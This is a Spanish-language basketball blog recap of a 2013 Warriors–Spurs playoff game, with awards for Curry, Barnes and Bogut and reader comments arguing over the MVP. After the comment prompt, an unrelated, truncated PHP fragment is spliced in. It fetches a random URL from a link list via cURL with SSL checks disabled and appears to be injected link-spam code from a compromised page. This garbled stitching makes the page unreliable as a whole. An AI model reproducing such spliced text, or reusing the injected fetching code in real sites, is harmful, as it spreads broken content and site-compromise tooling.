La Crónica: La victoria del guerrero cojo

13 de May de 2013 por MagicJohnson32

klay curryStephen Curry cruzaba la pista al trote, lentamente, como si estuviese calentando, como si su equipo no se jugase sus posibilidades de alcanzar las finales de conferencia. Así protegía su maltrecho tobillo, dolorido e infiltrado tras la torcedura al final del tercer partido de la serie. En unos tiempos de súper atlentas dotados de físicos prodigiosos, quedan pocos jugadores capaces de marcar diferencias jugando en segunda marcha, calculando cada esfuerzo, reservando fuerzas. Curry es uno de ellos. Sostenido por el esfuerzo prodigioso de Bogut, por la explosión definitiva de Harrison Barnes y por la mejor versión de Jarrett Jack de lo que llevamos de eliminatoria, Curry se mantuvo en pie y con él, todo un equipo.

Le costó arrancar a la estrella de los Warriors, que, como es lógico, necesitó un tiempo para adaptarse a las molestias. No iban a ser los Spurs quien le esperasen. Los texanos empezaron mejor el encuentro, especialmente a partir de la aparición de Ginóbili en pista, mediado el primer cuarto y con empate a 11. El argentino disparó a los suyos con cuatro triples en los minutos siguientes y sólo las respuestas de Harrison Barnes aguantaban a duras penas a los Warriors. Pese a que Jarrett Jack tomó el relevo anotador, la renta de los Spurs se mantuvo en torno a la decena hasta la segunda mitad. Entonces, dos triples consecutivos de Curry encendieron el ORACLE y los Warriors llegaron a situarse cuatro arriba con un nuevo triple de Barnes. Sin embargo, la respuesta de San Antonio fue inmediata y contundente: un parcial 17-5 ponía el 68-60 en el marcador y el miedo en el cuerpo de las 19.596 almas que abarrotaban el pabellón. Faltaban apenas 10 minutos para el final, pero lo mejor estaba por llegar.

Primero Harrison Barnes, que parece cualquier cosa menos un rookie, después Curry con otro triple, a continuación un espectacular Jack y finalmente Klay Thompson anotaron los puntos que hicieron posible la remontada junto a la defensa sobre Duncan de Andrew Bogut, de una influencia creciente conforme avanza la serie y descomunal en el tramo final del encuentro. Ambos equipos tuvieron la oportunidad de lograr la victoria pero Ginóbili y Jack erraron y se llegó a la prórroga, donde los Spurs se atascaron definitivamente. Los jugadores de San Antonio, visiblemente fatigados, fallaron sus primeros siete tiros de campo, además de dos libres, y para cuando anotaron su primera (y única) canasta del tiempo extra, ya era demasiado tarde. La prórroga acabó con un 3-13 para los locales, que celebraron la victoria (87-97) y se aseguraron que la serie regresará a Oakland para el sexto encuentro. Por nosotros, como si quieren jugar 10 más.

PREMIOS

MVP: Hay que apreciar lo que Steph Curry hizo anoche. Medio cojo, jugando muchos minutos sin el balón en sus manos, Curry llevó a su equipo a la victoria, como prueba el +23 que registró en sus 39 minutos en cancha, el mejor de largo del partido. Curry anotó 22 puntos (16 de ellos tras el descanso) con 15 tiros, incluyendo 5 triples, además de atrapar 6 rebotes y repartir 4 asistencias. Barnes, Jack y Bogut fueron imprescindibles pero Curry representó más que nadie el mérito de la victoria de los Warriors.

duncan bogutRookie: Sensacional Harrison Barnes, que ante los problemas de Curry y en un día discreto de Thompson, asumió la responsabilidad como un veterano. Lanzó más que nunca, anotó mucho (26 puntos), atrapó 10 rebotes (5 de ataque) y apareció en momentos cruciales. Qué jugadorazo.

Sorpresa: Se puede meter cinco puntos y ser fundamental, como prueba el encuentro de Andrew Bogut. El aussie cogió 18 rebotes pero, por encima de todo, secó a Tim Duncan, quien no anotó en los últimos 20 minutos de partido. Bogut dejó varias acciones defensivas que nos sirvieron para recordar que es uno de los mejores pívots de la liga en lo suyo.

Decepción: Uno no se espera que un equipo de la experiencia de los Spurs se bloquee en la prórroga. Una sola canasta de 10 intentos lograron los de Popovich en cinco minutos fatídicos, que vieron incluso como Ginóbili hacía agua en un triple abierto y Green fallaba dos tiros libres.

Esfuerzo en vano: Dejando de lado sus errores al final, el partido de Manu Ginóbili fue una maravilla. 21 puntos, 4 rebotes, 3 asistencias, 3 robos y 2 tapones consiguió el escolta argentino.

Imágenes | AP Photos / Getty Images

Comenta

11 comentarios a esta entrada

  1. Esteban dice:
    #1

    Lo de el trio curr, thompson y barnes no tiene nombre, a eta altura y conta semejante equipo es cosa muy muy seria d aca al futuro
    Piensese lo siguiente:
    Curry 4to año en la liga
    Thompson 2do año en la liga
    Barnes rookie

    Y si le sumamos a los rookies green y ezeli vaya futuro de equipo

    Por otra parte, se vio mal el trade en su momento por las lesiones de bogut, pero por lo echo en estos ppo
    D

      Citar

  2. Esteban dice:
    #2

    Continuo, con estos PO, Bogut hace ganadores del trade a los warriors

      Citar

  3. Denise dice:
    #3

    En mi opinión, el MVP es muy claramente para Jack. Lo de Curry tiene merito, pero solo anotaba tiros abiertos que sus compis se encargaban de ponerselo a huevo.
    Bogut lo hizo bien, pero Landry también secó a Duncan y en los momentos claves del ultimo cuarto donde GSW estaba remontando. Popovych decidió hacer el hack-a-Bogut y Marc Jackson tuvo que sentarlo hasta los dos ultimos minutos finales en el que el hack está prohibido.

      Citar

  4. shaggy dice:
    #4

    Comparto la opinion de Denise, aunque la aportacion de Curry fue fundamental y lo hizo todo andando, GS gano gracias a los 8-10 puntos consecutivos de Jack al final del 4º que acabaron aseguraron practicamente la prorroga, donde ya barrieron a GS

      Citar

  5. Lucho dice:
    #5

    Quien los daba como perdedores en el momento del trade? Lo que yo recuerdo es que la mayoria daba como ganador a GSW. El discurso del momento era: “Ellis y Curry no son compatibles. GS tiene que elegir cual quiere que sea su jugador franquicia. Eligio bien quedandose con Curry (que va a ser mucho mejor). Ellis ya demostro que no puede serlo. Y ademas su partida le hace lugar a un anotador pogencial como Thompson que hoy en dia esta tapado (en ese momento jugaba muy poco). Lo de Bogut es una apuesta. Una apuesta que vale correr a poco que se recupere un poco. Hoy dia los Warriors no defienden a nadie. Anotan mucho pero tambien les anotan mucho. Asi no van a ningun lado”

      Citar

  6. Esteban dice:
    #6

    Lucho:
    Quien los daba como perdedores en el momento del trade? Lo que yo recuerdo es que la mayoria daba como ganador a GSW. El discurso del momento era: “Ellis y Curry no son compatibles. GS tiene que elegir cual quiere que sea su jugador franquicia.Eligio bien quedandose con Curry (que va a ser mucho mejor). Ellis ya demostro que no puede serlo. Y ademas su partida le hace lugar a un anotador pogencial como Thompson que hoy en dia esta tapado (en ese momento jugaba muy poco). Lo de Bogut es una apuesta. Una apuesta que vale correr a poco que se recupere un poco. Hoy dia los Warriors no defienden a nadie. Anotan mucho pero tambien les anotan mucho. Asi no van a ningun lado”

    mi amjgo sancho88 jajaja bno te enojes, pero es la verdad

      Citar

  7. Esteban dice:
    #7

    Lucho:
    Quien los daba como perdedores en el momento del trade? Lo que yo recuerdo es que la mayoria daba como ganador a GSW. El discurso del momento era: “Ellis y Curry no son compatibles. GS tiene que elegir cual quiere que sea su jugador franquicia.Eligio bien quedandose con Curry (que va a ser mucho mejor). Ellis ya demostro que no puede serlo. Y ademas su partida le hace lugar a un anotador pogencial como Thompson que hoy en dia esta tapado (en ese momento jugaba muy poco). Lo de Bogut es una apuesta. Una apuesta que vale correr a poco que se recupere un poco. Hoy dia los Warriors no defienden a nadie. Anotan mucho pero tambien les anotan mucho. Asi no van a ningun lado”

    ademas, los dueños del equipo fueron abucheados por la grada de los warriors el partido siguiente al trade, y ellis ha jugado como 100 partidos mas en los bucks q bogut en los warriors

      Citar

  8. Lucho dice:
    #8

    jajaja no, todo bien. No me enoje, digo que se decia eso en ese momento

      Citar

  9. GreenPride dice:
    #9

    Pues los Warriors sacaron el pié del pozo.., En el partido más claro para los Spurs de todas las series, los de Oackland batallaron hasta el final para poner la elimintoria en empate. Comparto la opinión de que el MVP del partido es para Jarret Jack. Cuando los Spurs parecían irse definitivamente en el último cuarto firmó 4 canastas casi consecutivas para mantener vivo a su equipo. El resto lo hicieron entre Bogut y Barnes aunque Curry puso los chispazos en momentos importantes jugando a menos del 50% físicamente.
    Ahora la serie se traslada a San Antonio para un decisivo 5º partido con muchas incógnitas. Si bien en los 2 primeros partidos los Warriors hicieron valer su estilo anotador y Thompson y Curry las metieron de todos los colores, en estos 2 siguientes la defensa Spur parece haber encontrado soluciones ante los 2, especialmente ante Thompson y han tenido que salir Jack y Barnes al rescate de los de la bahía.
    Por los Spurs grandes en defensa Leonard y Green y grandes partidos hasta el tercer cuarto de Duncan y Ginobilli, sin embargo se les apagaron las luces en los últimos minutos y la prórroga dejando el interrogante de si los jóvenes Warriors no pueden llegar mucho más frescos a los momentos importantes que los veteranos Spurs.
    Ahora todos pendientes del tobillo de Curry ya que antes o después los Warriors le necesitarán si quieren pasar la eliminatoria.

      Citar

  10. Esteban dice:
    #10

    me da toda la impresion que tendremos a menphis o a los spurs batallando con el heat, mark y zach pueden hacerse una merienda con los internos del heat

      Citar

  11. MagicJohnson32 dice:
    #11

    Uy, mira cuántos voluntarios para hacer la próxima crónica y poner de MVP a quién les dé la gana xD

    A ver, para mí el MVP fue Curry por… mirad, imaginad que Ray Allen hubiese metido esta temporada 60 game winners. El MVP seguiría siendo LeBron. Jack fue decisivo, tal vez más que nadie, pero para mí no fue el mejor.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>